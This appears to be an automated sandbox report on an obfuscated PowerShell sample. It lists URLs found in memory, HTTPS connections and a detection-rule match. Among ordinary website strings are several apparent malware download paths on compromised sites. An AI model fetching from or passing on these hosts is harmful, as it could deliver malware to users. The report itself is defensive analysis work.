Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/css/app.css
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/js/analytics.js
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/js/jquery.min.js
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/js/manifest.js
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/js/work.js
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/layer/layer.js
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/swiper/css/swiper.min.css
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/themes/pandaminer/static/swiper/js/swiper.min.js
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/uploads/2020/12/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/uploads/2020/12/1-2.png)
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/uploads/2020/12/2-2.png)
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/uploads/2020/12/3-1.png)
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/uploads/2020/12/footer-logo-1.png
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/uploads/2020/12/gg.jpg
Source: powershell.exe, 00000002.00000002.323111990.000001B61115B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.comx
Source: powershell.exe, 00000002.00000002.323080629.000001B61112D000.00000004.00000001.sdmp | String found in binary or memory: http://freelancerwebdesignerhyderabad.com
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in binary or memory: http://freelancerwebdesignerhyderabad.com/cgi-bin/S/
Source: powershell.exe, 00000002.00000002.323080629.000001B61112D000.00000004.00000001.sdmp | String found in binary or memory: http://freelancerwebdesignerhyderabad.comx
Source: powershell.exe, 00000002.00000002.322999232.000001B6110BA000.00000004.00000001.sdmp | String found in binary or memory: http://mikegeerinck.com
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmp | String found in binary or memory: http://o.ss2.us/0
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in binary or memory: http://olympiasoft.io
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in binary or memory: http://olympiasoft.io/
Source: powershell.exe, 00000002.00000002.319033051.000001B610004000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmp | String found in binary or memory: http://r3.i.lencr.org/01
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmp | String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmp | String found in binary or memory: http://s.ss2.us/r.crl0
Source: powershell.exe, 00000000.00000002.332217824.00000199B17A1000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.318767737.000001B60FDF1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.323427840.000001B6112CA000.00000004.00000001.sdmp | String found in binary or memory: http://wm.mcdevelop.net
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in binary or memory: http://wm.mcdevelop.net/content/6F2gd/
Source: powershell.exe, 00000002.00000002.323427840.000001B6112CA000.00000004.00000001.sdmp | String found in binary or memory: http://wm.mcdevelop.netx
Source: powershell.exe, 00000002.00000002.319033051.000001B610004000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com/CPS0v
Source: powershell.exe, 00000002.00000002.323147364.000001B6111A0000.00000004.00000001.sdmp | String found in binary or memory: http://www.hintup.com.br
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.kompoz.eu/
Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmp | String found in binary or memory: http://www.stmarouns.nsw.edu.au
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in binary or memory: http://www.stmarouns.nsw.edu.au/paypal/b8G/
Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmp | String found in binary or memory: http://www.stmarouns.nsw.edu.aux
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkeyporn.online/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishporn.mobi/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishporn.pro/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishpornmovies.eu/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishporno.mobi/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishporno.online/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishporno.pro/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishpornography.eu/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishporntube.online/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishsex.eu/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishsex.online/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishsex.pro/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishxxx.online/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://www.turkishxxxvideos.eu/
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmp | String found in binary or memory: http://x.ss2.us/x.cer0&
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: 2D85F72862B55C4EADD9E66E06947F3D.2.dr | String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: powershell.exe, 00000002.00000002.324658342.000001B628066000.00000004.00000001.sdmp | String found in binary or memory: http://x1.i.lencr.org/2
Source: powershell.exe, 00000002.00000002.322633813.000001B61101C000.00000004.00000001.sdmp | String found in binary or memory: https://admintk.com
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in binary or memory: https://admintk.com/wp-admin/L/
Source: powershell.exe, 00000002.00000002.322633813.000001B61101C000.00000004.00000001.sdmp | String found in binary or memory: https://admintk.comx
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: https://api.w.org/
Source: A69S.dll.2.dr | String found in binary or memory: https://api.whatsapp.com/send?phone=5519995088264&text=Gostaria%20de%20mais%20detalhes
Source: A69S.dll.2.dr | String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in binary or memory: https://dream-media.net
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in binary or memory: https://dream-media.net/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in binary or memory: https://dream-media.net/client-accelerator-method/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in binary or memory: https://e-proposals.io/
Source: A69S.dll.2.dr | String found in binary or memory: https://fonts.googleapis.com/css?family=Product
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
Source: powershell.exe, 00000002.00000002.319033051.000001B610004000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://gmpg.org/xfn/11
Source: A69S.dll.2.drString found in binary or memory: https://hintup.io
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.322999232.000001B6110BA000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/#website
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/30-min-strategy-session/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/?s=
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/about-me/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/blog/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/c/YYsa/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/comments/feed/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/contact/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/feed/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/mike-daily-routine/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/our-team/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/call-to-action-box-animate-for-elementor/assets/css/eb-c
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/css/ecs-style.css?ver=3.1.0
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/js/ecs.js?ver=3.1.0
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/js/ecs_ajax_pagination.js?ver=3.1
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.1.1
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.2.3
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.2.3
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/images/placeholder.png
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eico
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.cs
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementskit-lite/modules/controls/assets/css/widgetarea-
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/cs
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.c
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-element
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/themes/astra/assets/css/minified/frontend.min.css?ver=3.1.2
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/themes/astra/assets/css/minified/menu-animation.min.css?ver=3.1.
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/themes/astra/assets/js/minified/flexibility.min.js?ver=3.1.2
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/WhatsApp-Image-2020-05-22-at-21.23.50-1-196x300.
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/WhatsApp-Image-2020-05-22-at-21.23.50-1.jpeg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-Logo-MG-100x98-1.png
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-180x180
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-192x192
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-270x270
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-32x32.p
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/client-206x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/client.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/dream-mdeia-206x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/dream-mdeia.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/olympia-1-207x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/olympia-1.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/proposal-202x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/proposal.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/script-201x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/script.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-1504.css?ver=1621160200
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-1525.css?ver=1621159702
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-207.css?ver=1615465769
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-494.css?ver=1621191965
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-6.css?ver=1621160200
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-892.css?ver=1621160200
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-includes/css/dist/block-library/style.min.css?ver=5.7.2
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-json/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/xmlrpc.php?rsd
Source: powershell.exe, 00000002.00000002.322999232.000001B6110BA000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.comx
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinckconsulting.com/
Source: powershell.exe, 00000002.00000002.323199850.000001B611210000.00000004.00000001.sdmp, A69S.dll.2.drString found in binary or memory: https://my.hintup.io
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://olympiasoft.io/
Source: powershell.exe, 00000002.00000002.323183656.000001B6111FF000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://schema.org
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://schema.org/WebPage
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://script-creators.com/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/edog.com
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://www.baidu.com/
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000002.00000002.323183656.000001B6111FF000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/g
Source: A69S.dll.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=AW-562017657
Source: powershell.exe, 00000002.00000002.323199850.000001B611210000.00000004.00000001.sdmp, A69S.dll.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-143676173-1
Source: powershell.exe, 00000002.00000002.323147364.000001B6111A0000.00000004.00000001.sdmpString found in binary or memory: https://www.hintup.com.br
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in binary or memory: https://www.hintup.com.br/wp-content/dE/
Source: powershell.exe, 00000002.00000002.323147364.000001B6111A0000.00000004.00000001.sdmpString found in binary or memory: https://www.hintup.com.brx
Source: A69S.dll.2.drString found in binary or memory: https://www.hintup.io/images/og_image_diffstuff.png
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/mikegeerinck/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://www.mikegeerinck.com/blog/
Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmpString found in binary or memory: https://www.stmarouns.nsw.edu.au
Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://www.stmarouns.nsw.edu.au/paypal/b8G/
Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmpString found in binary or memory: https://www.stmarouns.nsw.edu.aux
Source: powershell.exe, 00000002.00000002.323199850.000001B611210000.00000004.00000001.sdmp, A69S.dll.2.drString found in binary or memory: https://www.tutorialrepublic.com/examples/images/clients/1.jpg
Source: A69S.dll.2.drString found in binary or memory: https://www.tutorialrepublic.com/examples/images/clients/3.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/channel/UCezyOaog07qIo-EMB_zABkw?view_as=subscriber
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | HTTPS traffic detected: 35.214.199.246:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.223.27:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 143.204.98.64:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

System Summary:

Very long command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 5429
Source: ps_script.ps1, type: SAMPLE | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
